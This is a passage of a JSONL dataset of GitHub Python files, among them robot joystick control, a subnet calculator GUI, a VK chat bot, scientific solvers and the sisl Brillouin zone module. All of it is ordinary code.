released\" % (button))\n if button == \"y\":\n GPIO.output(6,GPIO.HIGH)#turn on other LED\n else:\n GPIO.output(6,GPIO.LOW)#otherwise turn it off - should turn off when any other button is pushed\n if button == \"x\":\n GPIO.output(GR2,GPIO.HIGH)\n GPIO.output(BL2,GPIO.HIGH)\n pwm.channels[GR2_PWM].duty_cycle = 0xFFFF\n pwm.channels[BL2_PWM].duty_cycle = 0xFFFF\n GPIO.output(16,GPIO.HIGH)\n else:\n GPIO.output(GR2,GPIO.LOW)\n GPIO.output(BL2,GPIO.LOW)\n pwm.channels[GR2_PWM].duty_cycle = 0\n pwm.channels[BL2_PWM].duty_cycle = 0\n GPIO.output(16,GPIO.LOW)\n if type & 0x02:\n axis = axis_map[number]\n #right joystick fwd/rev\n if axis==\"y2\":\n fvalue = value\n axis_states[axis] = fvalue\n intValy2 = int(fvalue)*2+1\n # Use \"PRINT\" for debugging, comment out to speed program\n print(\"%d\" % (intValy2))\n # Right joystick left/right\n if axis==\"x2\":\n fvalue = value\n axis_states[axis] = fvalue\n intValx2 = int(fvalue)*2+1\n # Left joystick fwd/rev\n if axis==\"y\":\n fvalue = value\n axis_states[axis] = fvalue\n intValy = int(fvalue)*2+1\n # Left joystick left/right\n if axis==\"x\":\n fvalue = value\n axis_states[axis] = fvalue\n intValx = int(fvalue)*2+1\n # Front right trigger fwd (vehicle ascend)\n if axis==\"ry\":\n fvalue = value\n axis_states[axis] = fvalue\n intValry = int(fvalue)*2+1\n # Front left trigger rev (vehicle descend)\n if axis==\"rx\":\n fvalue = value\n axis_states[axis] = fvalue\n intValrx = int(fvalue)*2+1\n\n # There's a nice tutorial for single joysick control at http://home.kendra.com/mauser/Joystick.html\n if intValy2<-100:\n\n GPIO.output(GR1,GPIO.LOW) # Direction pin\n pwm.channels[GR1_PWM].duty_cycle = abs(intValy2)\n\n elif intValy2>100:\n\n GPIO.output(GR1,GPIO.HIGH) # Direction pin\n pwm.channels[GR1_PWM].duty_cycle = (intValy2)\n\n else:\n pwm.channels[GR1_PWM].duty_cycle = 0\n\n if intValy>100:\n GPIO.output(BL1,GPIO.HIGH)#direction pin\n pwm.channels[BL1_PWM].duty_cycle = (intValy)\n\n elif intValy<-100:\n GPIO.output(BL1,GPIO.LOW)#direction pin\n pwm.channels[BL1_PWM].duty_cycle = abs(intValy)\n\n else:\n pwm.channels[BL1_PWM].duty_cycle = 0\n\n if intValrx>100:\n GPIO.output(OR1,GPIO.LOW)#direction pin\n GPIO.output(BR1,GPIO.LOW)#direction pin\n pwm.channels[OR1_PWM].duty_cycle = abs(intValrx)\n pwm.channels[BR1_PWM].duty_cycle = abs(intValrx)\n\n elif intValry>100:\n GPIO.output(OR1,GPIO.HIGH)#direction pin\n GPIO.output(BR1,GPIO.HIGH)#direction pin\n pwm.channels[OR1_PWM].duty_cycle = abs(intValry)\n pwm.channels[BR1_PWM].duty_cycle = abs(intValry)\n\n else:\n pwm.channels[OR1_PWM].duty_cycle = 0\n pwm.channels[BR1_PWM].duty_cycle = 0\n\nexcept (KeyboardInterrupt,SystemExit):\n pwm.channels[OR1_PWM].duty_cycle = 0\n pwm.channels[BR1_PWM].duty_cycle = 0\n pwm.channels[BL1_PWM].duty_cycle = 0\n pwm.channels[GR1_PWM].duty_cycle = 0\n GPIO.output(6,GPIO.LOW)\n GPIO.output(16,GPIO.LOW)\n GPIO.cleanup()","repo_name":"mxdrew/ROSPerch","sub_path":"rosperch/scripts/joy_controller.py","file_name":"joy_controller.py","file_ext":"py","file_size_in_byte":9759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14883863055","text":"import logging\n\nclass Parameter(object):\n \"\"\"\n Generic handler for parameters stored in configuration files\n\n Attributes:\n parameters dictionary containing the value for configuration parameters\n default_parameters dictionary containung default values for parameters\n \"\"\"\n def __init__(self, parameter_filename):\n self.parameters = {}\n self.default_parameters = {}\n if parameter_filename is None:\n logging.warning(\"No parameter file provided; using default parameters\")\n else:\n logging.info(\"Extract parameters from file {}\".format(parameter_filename))\n self.load_parameter_file(parameter_filename)\n\n def load_parameter_file(self, parameter_filename):\n with open(parameter_filename) as f:\n for line in f.readlines():\n # Ignore comments\n if line.startswith(\"#\"):\n continue\n\n try:\n # Also get rid of trailing characters\n key, value = line.strip().split(\":\")\n if key in self.parameters:\n if not isinstance(self.parameters[key], list):\n self.parameters[key] = [self.parameters[key]]\n self.parameters[key].append(value)\n else:\n self.parameters[key] = value\n except ValueError as e:\n logging.warning(\n \"Got error '{}' for line '{}'; ignore it\".format(e, line))\n\n def get(self, key):\n \"\"\"\n Get the value of the parameter with key `key`.\n If not defined by the configuration file, return the default value.\n Raise Exception if the parameter has no default value and is absent.\n \"\"\"\n val = self.parameters.get(key)\n if val is None:\n if key in self.default_parameters:\n return self.default_parameters[key]\n else:\n raise Exception(\"Parameter not found \" + key)\n else:\n return val\n\n def __str__(self):\n return self.parameters.__str__()\n","repo_name":"qdeconinck/minitopo","sub_path":"core/parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"7440904681","text":"from collections import namedtuple\nimport pandas as pd\nimport sqlite3\n\n\"\"\" \nData types and any add'l metadata from: \nhttp://earthquake.usgs.gov/earthquakes/feed/v1.0/glossary.php \n\"\"\"\n\ndef get_db(db_name):\n \"\"\" \n Create a DB connection to the table passed in by db_name. \n Returns a namedtuple containing the connection object and the DB cursor.\n \"\"\"\n db_conn_mgr = namedtuple('db_conn_mgr', ['conn', 'cursor'])\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n return db_conn_mgr(conn, cursor)\n\ndef create_eq_table(csv_file, db_location):\n dataframe = pd.read_csv(csv_file)\n db = get_db(db_location)\n # Careful! This will replace an existing db.\n dataframe.to_sql('all_earthquakes', db.conn, if_exists='replace', index=False)\n","repo_name":"joedougherty/earthquake_etl","sub_path":"eq_database.py","file_name":"eq_database.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11098503125","text":"from datetime import datetime, timedelta\nfrom os import environ\nfrom time import mktime\n\nfrom google.appengine.ext import ndb\n\n\nDEBUG = ('Development' in environ.get('SERVER_SOFTWARE', 'Production'))\n\n\ndef datetime_to_millis(dt):\n return int(mktime(dt.utctimetuple())) * 1000\n\n\ndef millis_to_datetime(value):\n seconds = int(value/1000.0)\n dt = datetime.utcfromtimestamp(seconds) + timedelta(milliseconds=int(value)-seconds*1000)\n return dt\n\n\ndef future_iterator(futures):\n while futures:\n if len(futures) == 1:\n future = futures[0]\n else:\n future = ndb.Future.wait_any(futures)\n futures.remove(future)\n yield future\n","repo_name":"jairajs89/starter-kit-appengine","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42238233701","text":"# Title: Subnet Calculator: Subnet Calculator GUI\r\n# Date: 04-04-2017\r\n\r\n\r\nfrom SubnetCalculator.GenSubnetCalcGUI import GenSubnetCalcGUI\r\nfrom SubnetCalculator.CIDRCalcGUI import CIDRCalcGUI\r\nfrom SubnetCalculator.NetCalcGUI import NetCalcGUI\r\nfrom SubnetCalculator.NetmaskCalcGUI import NetmaskCalcGUI\r\nfrom SubnetCalculator.BroadcastCalcGUI import BroadcastCalcGUI\r\nfrom SubnetCalculator.IPRangeCalcGUI import IPRangeCalcGUI\r\nfrom SubnetCalculator.TotalHostCalcGUI import TotalHostCalcGUI\r\nfrom SubnetCalculator.AssignableHostCountCalcGUI import AssignHostCalcGUI\r\nfrom tkinter import Tk\r\nfrom tkinter import Button\r\n\r\n\r\nclass SubnetCalculatorGUI:\r\n def __init__(self):\r\n self.calculator = Tk()\r\n self.calculator.wm_title('Subnet Calculator')\r\n self.general_calculator = Button(self.calculator, text='General Subnet Calculator', width=50,\r\n command=lambda: GenSubnetCalcGUI().generate_main())\r\n self.cidr_calculator = Button(self.calculator, text='CIDR Calculator', width=50,\r\n command=lambda: CIDRCalcGUI().generate_main())\r\n self.network_address_calculator = Button(self.calculator, text='Network Address Calculator', width=50,\r\n command=lambda: NetCalcGUI().generate_main())\r\n self.netmask_calculator = Button(self.calculator, text='Netmask Calculator', width=50,\r\n command=lambda: NetmaskCalcGUI().generate_main())\r\n self.broadcast_address_calculator = Button(self.calculator, text='Broadcast Address Calculator', width=50,\r\n command=lambda: BroadcastCalcGUI().generate_main())\r\n self.ip_range_calculator = Button(self.calculator, text='Assignable IP Range Calculator', width=50,\r\n command=lambda: IPRangeCalcGUI().generate_main())\r\n self.total_host_calculator = Button(self.calculator, text='Total Host Count Calculator', width=50,\r\n command=lambda: TotalHostCalcGUI().generate_main())\r\n self.assignable_host_calculator = Button(self.calculator, text='Assignable Host Count Calculator', width=50,\r\n command=lambda: AssignHostCalcGUI().generate_main())\r\n\r\n self.general_calculator.pack()\r\n self.cidr_calculator.pack()\r\n self.network_address_calculator.pack()\r\n self.netmask_calculator.pack()\r\n self.broadcast_address_calculator.pack()\r\n self.ip_range_calculator.pack()\r\n self.total_host_calculator.pack()\r\n self.assignable_host_calculator.pack()\r\n\r\n self.calculator.mainloop()\r\n","repo_name":"dwitt006/SubnetCalculator","sub_path":"SubnetCalculator/SubnetCalculatorGUI.py","file_name":"SubnetCalculatorGUI.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34453064289","text":"import wpilib\nimport ctre\n\nclass S_1:\n def __init__(self, robot, ):\n self.robot = robot\n\n self.has_crossed_line = False\n self.has_turned = False\n self.has_arrived = False\n self.has_shot = False\n self.inicial_state = self.robot.right_drivetrain_motor.getSelectedSensorPosition()\n self.shot_pos = 0\n self.turning_timestamp = 0\n self.exit_timestamp = 0\n self.goal = (4159*3.6)\n self.exit_goal = -1*(4159*4)\n\n\n\n def drive(self):\n #una vuelta equivale a 4159\n #una vuelta 47.87cm\n\n if not self.has_arrived:\n if self.robot.right_drivetrain_motor.getSelectedSensorPosition() - self.inicial_state < (self.goal - 100):\n self.robot.drivetrain.drive_with_gyro_pid(self.robot.navx, .4)\n\n if self.robot.right_drivetrain_motor.getSelectedSensorPosition() - self.inicial_state > (self.goal + 100):\n self.has_arrived = True\n self.robot.drivetrain.stop()\n self.turning_timestamp = self.robot.auto_timer.getFPGATimestamp()\n self.shot_pos = self.robot.right_drivetrain_motor.getSelectedSensorPosition()\n\n\n\n elif not self.has_shot:\n if self.robot.auto_timer.getFPGATimestamp() < self.turning_timestamp + 3:\n self.robot.box_lift_motor.set(.6)\n\n elif self.robot.auto_timer.getFPGATimestamp() > self.turning_timestamp +2 and wpilib.Timer.getFPGATimestamp() < (self.turning_timestamp + 4) :\n self.robot.intake_motor.set(-.8)\n\n elif self.robot.auto_timer.getFPGATimestamp() > self.turning_timestamp + 4:\n self.robot.box_lift_motor.set(0)\n self.robot.intake_motor.set(0)\n self.has_shot = True\n self.exit_timestamp = self.robot.auto_timer.getFPGATimestamp()\n\n else:\n wpilib.SmartDashboard.putBoolean(keyName=\"has_shoot\", value=self.has_shot)\n\n if self.robot.auto_timer.getFPGATimestamp() < self.exit_timestamp + 3:\n self.robot.drivetrain.drive_with_gyro_pid(self.robot.navx, -.5)\n\n elif self.robot.auto_timer.getFPGATimestamp() > self.exit_timestamp + 3:\n self.robot.drivetrain.stop()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"HORUS-Team6348/2020-robotcode","sub_path":"Autos/Station1.py","file_name":"Station1.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29179494206","text":"import os\n\nmelon = input(\"тЦатЦатЦатЦаЁЯНЦ :\") + '/'\n\nos.chdir(melon)\n\nhomer = os.listdir()\n\nmw = []\nmwd = []\n\nfor home in homer:\n mw.append(home)\n\n\nfor egg in mw:\n if os.path.isdir(egg):\n mwd.append(egg)\n\nfor vinte in mwd:\n os.rmdir(vinte)\n\nprint(os.listdir())\n\n#fishingdonut\n","repo_name":"FishingDonut/delete_myfiles","sub_path":"delbeta.py","file_name":"delbeta.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71943939073","text":"from commands import commands\nclass BotCommand:\n\t\n\n\tdef __init__(self):\n\t\tself.Ksusha_cnt = 0\n\t\tpass\n\t\n\tdef __get_reponse(self,name_of_command:str):\n\t\tresponse = {'message': commands[name_of_command]['message'],'attachment': commands[name_of_command]['attachment']}\n\t\treturn response\n\n\tdef __is_has_trigged_word_in_command(self,command,message_):\n\t\twords = message_.split(' ')\n\t\ttriggered:bool = False \n\t\tfor word in words: \n\t\t\ttry:\n\t\t\t\tif word in commands[command]['triggers']:\n\t\t\t\t\ttriggered = True\n\t\t\t\t\tbreak\t\n\t\t\texcept:\n\t\t\t\tprint('null')\n\t\treturn triggered\n\n\n\tdef Hello(self, message_ = None):\n\t\tif message_ != None:\n\t\t\treturn self.__is_has_trigged_word_in_command('hello',message_)\n\t\telse:\n\t\t\treturn self.__get_reponse('hello')\n\t\t\n\tdef Bebra(self, message_ = None):\n\t\tif message_!= None:\n\t\t\treturn commands['bebra']['triggers'][0] and commands['bebra']['triggers'][1] in message_\n\t\telse:\n\t\t\treturn self.__get_reponse('bebra')\n\n\n\tdef Ksusha(self, message_ = None):\n\t\tif message_ != None:\n\t\t\treturn self.__is_has_trigged_word_in_command('Ksusha',message_)\n\t\telse:\n\t\t\tif self.Ksusha_cnt >= 5:\n\t\t\t\tself.Ksusha_cnt = 0\n\t\t\t\treturn self.__get_reponse('Ksusha')\n\t\t\telse:\n\t\t\t\tself.Ksusha_cnt += 1\n\t\t\t\treturn None\n\t\t\t\n\n\tdef Tekstilshik(self, message_ = None):\n\t\tif message_ != None:\n\t\t\treturn self.__is_has_trigged_word_in_command('Tekstilshik',message_)\n\t\telse:\n\t\t\treturn self.__get_reponse('Tekstilshik')\n\n\n\tdef Homework(self, message_ = None):\n\t\tif message_ != None:\n\t\t\treturn commands['homework']['triggers'][0] and (commands['homework']['triggers'][1] or commands['homework']['triggers'][2]) in message_\n\t\telse:\n\t\t\treturn self.__get_reponse('homework')\n\n\t\n\n\tdef We_are_Bitches(self):\n\t\treturn self.__get_reponse('we_are_bitches')","repo_name":"Dioneya/VkBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2395199178","text":"\"\"\"Add job output\n\nRevision ID: 77b544d0cf77\nRevises: 29dcedf5d323\nCreate Date: 2021-08-21 21:33:13.539059\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '77b544d0cf77'\ndown_revision = '29dcedf5d323'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('jobs', sa.Column('output', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('jobs', 'output')\n # ### end Alembic commands ###\n","repo_name":"OpenChemistry/distiller","sub_path":"backend/app/alembic/versions/77b544d0cf77_add_job_output.py","file_name":"77b544d0cf77_add_job_output.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33283592111","text":"'''\r\nCreated on 30.08.2018\r\n\r\n@author: Alex\r\n'''\r\n\r\nfrom functions import matM, matK\r\nfrom coefficientsANDcost import b, df, dh, dl, db, dh, ga\r\nimport numpy as np\r\nfrom scipy.sparse.linalg import spsolve\r\nfrom scipy import sparse\r\n\r\n\r\ndef adjoint(L,T,a,y,yref,yT,dx,dt,bd,alpha,delta,gamma,eta,Dy,Dz,z):\r\n \r\n \r\n #output\r\n c=[]\r\n \r\n nt=int(T/float(dt))\r\n nx=int(a/float(dx))\r\n \r\n M=matM(nx,dx,bd)\r\n K=matK(nx,dx,bd)\r\n \r\n\r\n \r\n #initialize adjoint vector\r\n p1=np.zeros([nx,nt])\r\n p2=np.zeros([nx,nt])\r\n \r\n #initialize matrix for linear equation\r\n Mk=((1/dt)*M+Dy*K)\r\n Mk2=((1/dt+delta)*M+Dz*K)\r\n Mk=sparse.csr_matrix(Mk)\r\n Mk2=sparse.csr_matrix(Mk2)\r\n\r\n \r\n p1[:,nt-1]=dh(y[:,nt-1],yT)\r\n\r\n \r\n ppre1=p1[:,nt-1]\r\n #ppre2=p2[:,nt-1]\r\n \r\n #gradient coefficients\r\n g=np.zeros([L,nx,nt])\r\n \r\n #gradient nodes\r\n gz=np.zeros([L])\r\n \r\n \r\n g[:,:,nt-1]=db(y[:,nt-1], alpha[:,:,nt-1],z,ppre1)[1]+2*ga*db(y[:,nt-1], alpha[:,:,nt-1],z, b(y[:,nt-1],alpha[:,:,nt-1],z))[1]\r\n \r\n\r\n #calculate adjoint backward in time\r\n for k in range(nt-2,-1,-1):\r\n \r\n ytk=y[:,k]\r\n \r\n #evaluate gateaux differential of control in state in direction of the adjoint\r\n #dbx=db(ytk, alpha[:,:,k],z,ppre1)\r\n \r\n \r\n phi1=spsolve(Mk,M.dot(df(ytk, ppre1)+db(ytk, alpha[:,:,k],z,ppre1)[0]+dl(k*dt, ytk, yref[:,k], alpha[:,:,k],z)+(1/dt)*ppre1))\r\n #phi2=spsolve(Mk2,M.dot(gamma*ppre1+(1/dt)*ppre2))\r\n \r\n p1[:,k]=phi1\r\n #p2[:,k]=phi2\r\n \r\n ppre1=phi1\r\n #ppre2=phi2\r\n \r\n #gradient for coefficients\r\n g[:,:,k]=db(ytk,alpha[:,:,k],z,ppre1)[1]+2*ga*db(ytk,alpha[:,:,k],z,b(ytk,alpha[:,:,k],z))[1]\r\n \r\n #gradient for nodes \r\n gz=gz+dt*db(ytk,alpha[:,:,k],z,ppre1)[2]+dt*2*ga*db(ytk,alpha[:,:,k],z,b(ytk,alpha[:,:,k],z))[2]\r\n \r\n \r\n c.append(p1)\r\n c.append(p2)\r\n c.append(g)\r\n c.append(gz)\r\n \r\n return c\r\n \r\n ","repo_name":"AVoglerTu/SFB910Feedback","sub_path":"Pythoncode/NagumoNemytskiiControl/adjCoupled.py","file_name":"adjCoupled.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4255893634","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\"\"\"Brillouin zone classes\n=========================\n\nThe Brillouin zone objects are all special classes enabling easy manipulation\nof an underlying physical quantity.\n\nQuite often a physical quantity will be required to be averaged, or calculated individually\nover a number of k-points. In this regard the Brillouin zone objects can help.\n\nThe BrillouinZone object allows direct looping of contained k-points while invoking\nparticular methods from the contained object.\nThis is best shown with an example:\n\n>>> H = Hamiltonian(...)\n>>> bz = BrillouinZone(H)\n>>> bz.apply.array.eigh()\n\nThis will calculate eigenvalues for all k-points associated with the `BrillouinZone` and\nreturn everything as an array. The `~sisl.physics.BrillouinZone.dispatch` property of\nthe `BrillouinZone` object has several use cases (here ``array`` is shown).\n\nThis may be extremely convenient when calculating band-structures:\n\n>>> H = Hamiltonian(...)\n>>> bs = BandStructure(H, [[0, 0, 0], [0.5, 0, 0]], 100)\n>>> bs_eig = bs.apply.array.eigh()\n>>> plt.plot(bs.lineark(), bs_eig)\n\nand then you have all eigenvalues for all the k-points along the path.\n\nSometimes one may want to post-process the data for each k-point.\nAs an example lets post-process the DOS on a per k-point basis while\ncalculating the average:\n \n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> E = np.linspace(-2, 2, 100)\n>>> def wrap_DOS(eigenstate):\n... # Calculate the DOS for the eigenstates\n... DOS = eigenstate.DOS(E)\n... # Calculate the velocity for the eigenstates\n... v = eigenstate.velocity()\n... V = (v ** 2).sum(1)\n... return DOS.reshape(-1, 1) * v ** 2 / V.reshape(-1, 1)\n>>> DOS = mp.apply.average.eigenstate(wrap=wrap_DOS, eta=True)\n\nThis will, calculate the Monkhorst pack k-averaged DOS split into 3 Cartesian\ndirections based on the eigenstates velocity direction. This method of manipulating\nthe result can be extremely powerful to calculate many quantities while running an\nefficient `BrillouinZone` average. The `eta` flag will print, to stdout, a progress-bar.\nThe usage of the ``wrap`` method are also passed optional arguments, ``parent`` which is\n``H`` in the above example. ``k`` and ``weight`` are the current k-point and weight of the\ncorresponding k-point. An example could be to manipulate the DOS depending on the k-point and\nweight:\n\n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> E = np.linspace(-2, 2, 100)\n>>> def wrap_DOS(eigenstate, k, weight):\n... # Calculate the DOS for the eigenstates and weight by k_x and weight\n... return eigenstate.DOS(E) * k[0] * weight\n>>> DOS = mp.apply.sum.eigenstate(wrap=wrap_DOS, eta=True)\n\nWhen using wrap to calculate more than one quantity per eigenstate it may be advantageous\nto use `~sisl.oplist` to handle cases of `BrillouinZone.apply.average` and `BrillouinZone.apply.sum`.\n\n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> E = np.linspace(-2, 2, 100)\n>>> def wrap_multiple(eigenstate):\n... # Calculate DOS/PDOS for eigenstates\n... DOS = eigenstate.DOS(E)\n... PDOS = eigenstate.PDOS(E)\n... # Calculate velocity for the eigenstates\n... v = eigenstate.velocity()\n... return oplist([DOS, PDOS, v])\n>>> DOS, PDOS, v = mp.apply.average.eigenstate(wrap=wrap_multiple, eta=True)\n\nWhich does mathematical operations (averaging/summing) using `~sisl.oplist`.\n\n\nParallel calculations\n---------------------\n\nThe ``apply`` method looping k-points may be explicitly parallelized.\nTo run parallel do:\n\n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> with mp.apply.renew(pool=True) as par:\n... par.eigh()\n\nThis requires you also have the package ``pathos`` available.\nThe above will run in parallel using a default number of processors\nin priority:\n\n1. Environment variable ``SISL_NUM_PROCS``\n2. Return value of ``os.cpu_count()``.\n\nNote that this may interfere with BLAS implementation which defaults\nto use all CPU's for threading. The total processors/threads that will\nbe created is ``SISL_NUM_PROCS * OMP_NUM_THREADS``. Try and ensure this is below\nor equal to the actual core-count of your machine (or the number of requested\ncores in a HPC environment).\n\n\nAlternatively one can control the number of processors locally by doing:\n\n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> with mp.apply.renew(pool=2) as par:\n... par.eigh()\n\nwhich will request 2 processors (regardless of core-count).\nAs a last resort you can pass your own ``Pool`` of workers that\nwill be used for the parallel processing.\n\n>>> from multiprocessing import Pool\n>>> pool = Pool(4)\n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> with mp.apply.renew(pool=pool) as par:\n... par.eigh()\n\nThe ``Pool`` should implement some standard methods that are\nexisting in the ``pathos`` enviroment such as ``Pool.restart`` and ``Pool.terminate``\nand ``imap`` and ``uimap`` methods. See the ``pathos`` documentation for detalis.\n\n\n BrillouinZone\n MonkhorstPack\n BandStructure\n\n\"\"\"\n\nimport itertools\nfrom functools import reduce\nfrom numbers import Integral, Real\n\nimport numpy as np\nfrom numpy import argsort, dot, pi, sum\n\nimport sisl._array as _a\nfrom sisl._dispatcher import ClassDispatcher\nfrom sisl._internal import set_module\nfrom sisl.grid import Grid\nfrom sisl.lattice import Lattice\nfrom sisl.messages import SislError, deprecate_argument, info, progressbar, warn\nfrom sisl.oplist import oplist\nfrom sisl.quaternion import Quaternion\nfrom sisl.unit import units\nfrom sisl.utils import batched_indices\nfrom sisl.utils.mathematics import cart2spher, fnorm\n\n__all__ = [\"BrillouinZone\", \"MonkhorstPack\", \"BandStructure\", \"linspace_bz\"]\n\n\nclass BrillouinZoneDispatcher(ClassDispatcher):\n r\"\"\"Loop over all k-points by applying `parent` methods for all k.\n\n This allows potential for running and collecting various computationally\n heavy methods from a single point on all k-points.\n\n The `apply` method will *dispatch* the parent methods through all k-points\n and passing `k` as arguments to the parent methods in a straight-forward manner.\n\n For instance to iterate over all eigenvalues of a Hamiltonian\n\n >>> H = Hamiltonian(...)\n >>> bz = BrillouinZone(H)\n >>> for ik, eigh in enumerate(bz.apply.eigh()):\n ... # do something with eigh which corresponds to bz.k[ik]\n\n By default the `apply` method exposes a set of dispatch methods:\n\n - `apply.iter`, the default iterator module\n - `apply.average` reduced result by averaging (using `BrillouinZone.weight` as the weight per k-point.\n - `apply.sum` reduced result without weighing\n - `apply.array` return a single array with all values; has `len` equal to number of k-points\n - `apply.none`, specialized method that is mainly useful when wrapping methods\n - `apply.list` same as `apply.array` but using Python list as return value\n - `apply.oplist` using `sisl.oplist` allows greater flexibility for mathematical operations element wise\n - `apply.datarray` if `xarray` is available one can retrieve an `xarray.DataArray` instance\n\n Please see :ref:`physics.brillouinzone` for further examples.\n \"\"\"\n pass\n\n\n@set_module(\"sisl.physics\")\ndef linspace_bz(bz, stop=None, jumps=None, jump_dk=0.05):\n r\"\"\"Convert points from a BZ object into a linear spacing of maximum value `stop`\n\n Parameters\n ----------\n bz : BrillouinZone, or ndarray\n the object containing the k-points\n stop : int or None, optional\n maximum value in the linear space, or if None, will return the cumulative\n distance of the k-points in the Brillouin zone\n jumps: array_like, optional\n whether there are any jumps for the k-points that should not be taken into account\n jump_dk: float or array_like, optional\n how much total distance the jump points will take\n\n Returns\n -------\n\n \"\"\"\n if isinstance(bz, BrillouinZone):\n cart = bz.tocartesian(bz.k)\n else:\n cart = bz\n # calculate vectors between each neighbouring points\n dcart = np.diff(cart, axis=0, prepend=cart[0].reshape(1, -1))\n # calculate distances\n dist = (dcart**2).sum(1) ** 0.5\n\n if jumps is not None:\n # calculate the total distance\n total_dist = dist.sum()\n\n # Zero out the jumps\n dist[jumps] = 0.0\n total_dist = dist.sum()\n # correct jumps\n dist[jumps] = total_dist * np.asarray(jump_dk)\n\n # convert to linear scale\n if stop is None:\n return np.cumsum(dist)\n\n total_dist = dist.sum() / stop\n # Scale to total length of `stop`\n return np.cumsum(dist) / total_dist\n\n\n@set_module(\"sisl.physics\")\nclass BrillouinZone:\n \"\"\"A class to construct Brillouin zone related quantities\n\n It takes any object (which has access to cell-vectors) as an argument\n and can then return the k-points in non-reduced units from reduced units.\n\n The object associated with the BrillouinZone object *has* to implement\n at least two different properties:\n\n 1. `cell` which is the lattice vector\n 2. `rcell` which is the reciprocal lattice vectors.\n\n The object may also be an array of floats in which case an internal\n `Lattice` object will be created from the cell vectors (see `Lattice` for\n details).\n\n Parameters\n ----------\n parent : object or array_like\n An object with associated ``parent.cell`` and ``parent.rcell`` or\n an array of floats which may be turned into a `Lattice`\n k : array_like, optional\n k-points that this Brillouin zone represents\n weight : scalar or array_like, optional\n weights for the k-points.\n \"\"\"\n\n def __init__(self, parent, k=None, weight=None):\n self.set_parent(parent)\n # define a bz_attr as though it has not been set\n self._bz_attr = (\"\", None)\n\n # Gamma point\n if k is None:\n self._k = _a.zerosd([1, 3])\n self._w = _a.onesd(1)\n else:\n self._k = _a.arrayd(k).reshape(-1, 3)\n self._w = _a.emptyd(len(k))\n if weight is None:\n weight = 1.0 / len(self._k)\n self._w[:] = weight\n\n apply = BrillouinZoneDispatcher(\n \"apply\",\n # Do not allow class dispatching\n type_dispatcher=None,\n obj_getattr=lambda obj, key: getattr(obj.parent, key),\n )\n\n def set_parent(self, parent):\n \"\"\"Update the parent associated to this object\n\n Parameters\n ----------\n parent : object or array_like\n an object containing cell vectors\n \"\"\"\n try:\n # It probably has the supercell attached\n parent.cell\n parent.rcell\n self.parent = parent\n except Exception:\n self.parent = Lattice(parent)\n\n def __str__(self):\n \"\"\"String representation of the BrillouinZone\"\"\"\n parent = self.parent\n if isinstance(parent, Lattice):\n parent = str(parent).replace(\"\\n\", \"\\n \")\n else:\n parent = str(parent.lattice).replace(\"\\n\", \"\\n \")\n return f\"{self.__class__.__name__}{{nk: {len(self)},\\n {parent}\\n}}\"\n\n def __getstate__(self):\n \"\"\"Return dictionary with the current state\"\"\"\n return {\n \"parent_class\": self.parent.__class__,\n \"parent\": self.parent.__getstate__(),\n \"k\": self._k.copy(),\n \"weight\": self._w.copy(),\n }\n\n def __setstate__(self, state):\n \"\"\"Reset state of the object\"\"\"\n self._k = state[\"k\"]\n self._w = state[\"weight\"]\n parent = state[\"parent_class\"].__new__(state[\"parent_class\"])\n parent.__setstate__(state[\"parent\"])\n self.set_parent(parent)\n\n @staticmethod\n def merge(bzs, weight_scale=1.0, parent=None):\n \"\"\"Merge several BrillouinZone objects into one\n\n The merging strategy only stores the new list of k-points and weights.\n Information retained in the merged objects will not be stored.\n\n Parameters\n ----------\n bzs : list-like of BrillouinZone objects\n each element is a BrillouinZone object with ``bzs[i].k`` and ``bzs[i].weight``\n fields.\n weight_scale : list-like or float\n these are matched item-wise with `bzs` and applied to.\n Internally ``itertools.zip_longest(fillvalue=weight_scale[-1])`` will be\n used to extend for all `bzs`.\n parent : object, optional\n Associated parent in the returned object, will default to ``bzs[0].parent``\n\n Returns\n -------\n BrillouinZone:\n even if all objects are not 